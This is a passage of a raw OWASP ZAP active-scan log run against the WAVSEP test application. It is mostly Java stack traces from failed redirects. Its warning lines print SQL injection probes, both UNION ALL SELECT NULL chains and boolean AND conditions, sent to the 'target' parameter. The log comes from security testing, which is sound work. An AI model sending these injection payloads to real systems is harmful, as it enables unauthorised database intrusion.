org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681958 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681958 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681959 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681960 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681960 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9681999 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 6914=9709 AND (7048=7048] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 6914=9709 AND (7048=7048 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681999 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4634=1061 AND (2286=2286] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4634=1061 AND (2286=2286 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682000 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 3023=3023 AND (6834=6834] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 3023=3023 AND (6834=6834 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682000 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9226=9226 AND (2991=2991] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9226=9226 AND (2991=2991 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682001 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 6914=9709 AND (7048=7048] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 6914=9709 AND (7048=7048 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682001 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4634=1061 AND (2286=2286] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4634=1061 AND (2286=2286 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682002 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6988=1066] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6988=1066 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682003 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3615=3615] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3615=3615 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682003 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3765=1565] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3765=1565 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682004 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2710=2710] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2710=2710 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 